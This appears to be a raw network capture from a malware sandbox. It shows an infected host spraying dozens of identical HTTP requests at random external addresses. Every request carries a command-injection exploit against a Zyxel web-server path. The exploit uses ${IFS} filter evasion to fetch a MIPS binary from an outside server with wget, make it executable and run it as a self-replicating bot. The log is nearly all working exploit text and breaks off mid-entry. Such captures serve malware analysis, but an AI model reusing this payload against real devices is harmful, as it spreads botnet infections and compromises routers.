                                            Feb 2, 2024 06:21:16.702013016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5274192.168.2.1558948221.178.16.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702052116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5275192.168.2.1536284185.92.129.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702081919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5276192.168.2.154238419.110.235.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702121019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5277192.168.2.1542454171.98.77.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702171087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5278192.168.2.1546882126.122.177.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702197075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5279192.168.2.1557342197.48.134.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702241898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5280192.168.2.1546028106.60.117.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702267885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5281192.168.2.154538064.21.57.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702300072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5282192.168.2.1548624138.182.68.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702349901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5283192.168.2.1548162150.241.13.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702388048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5284192.168.2.1547914118.204.46.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702418089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5285192.168.2.1535588160.113.152.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702464104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5286192.168.2.1545846110.226.11.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702503920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5287192.168.2.1553830198.164.60.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702550888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5288192.168.2.1556316175.217.81.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702594995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5289192.168.2.1542800118.239.185.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702636957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5290192.168.2.1534126123.123.108.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702662945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5291192.168.2.1556320189.103.135.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702711105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5292192.168.2.1536418212.202.107.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702752113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5293192.168.2.1551034155.62.160.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702800989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5294192.168.2.1549862101.71.246.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702833891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5295192.168.2.155542078.26.14.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702883959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5296192.168.2.1539308141.171.144.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702928066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5297192.168.2.1542512134.208.234.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702949047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5298192.168.2.154932070.131.93.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.702991962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5299192.168.2.1552586109.242.140.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703041077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5300192.168.2.154837047.147.180.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703075886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5301192.168.2.1560064160.252.15.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703124046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5302192.168.2.1551958151.83.26.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703154087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5303192.168.2.1553498133.65.78.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703181982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5304192.168.2.155842888.177.76.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703224897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5305192.168.2.1535378108.194.20.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703257084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5306192.168.2.1559938110.102.44.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703283072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5307192.168.2.154827692.52.26.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703325033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5308192.168.2.153745875.2.110.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703366995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5309192.168.2.1553304195.115.50.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703399897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5310192.168.2.1546988207.236.36.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703444004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5311192.168.2.1539214149.107.197.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703484058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5312192.168.2.1543992216.222.101.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703499079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5313192.168.2.1543498111.167.106.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703546047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5314192.168.2.154347639.117.190.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703567982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5315192.168.2.154975235.187.30.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703598022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5316192.168.2.154959224.180.10.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703668118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5317192.168.2.1533584161.218.24.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703694105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5318192.168.2.155159082.124.25.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703814983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5319192.168.2.1537972211.202.128.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703847885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5320192.168.2.1558086157.29.213.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703876972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5321192.168.2.1558344197.36.199.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703917027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5322192.168.2.1536348116.62.64.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703942060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5323192.168.2.1535176189.242.54.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.703988075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5324192.168.2.1540460190.105.44.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704025984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5325192.168.2.154196257.5.80.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704081059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5326192.168.2.156052295.175.145.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704123020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5327192.168.2.1549226176.111.123.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704165936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5328192.168.2.153602883.159.98.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704185009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5329192.168.2.1534748190.48.172.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704236031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5330192.168.2.1551182213.161.76.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704265118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5331192.168.2.1537710219.153.225.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704303980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5332192.168.2.153977039.101.218.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704322100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5333192.168.2.1549730219.251.38.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704353094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5334192.168.2.154862870.137.249.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704385996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5335192.168.2.154024446.134.82.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704430103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5336192.168.2.155071642.206.19.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:16.704472065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5337192.168.2.1535642125.35.84.225443
                                            TimestampBytes transferredDirectionData
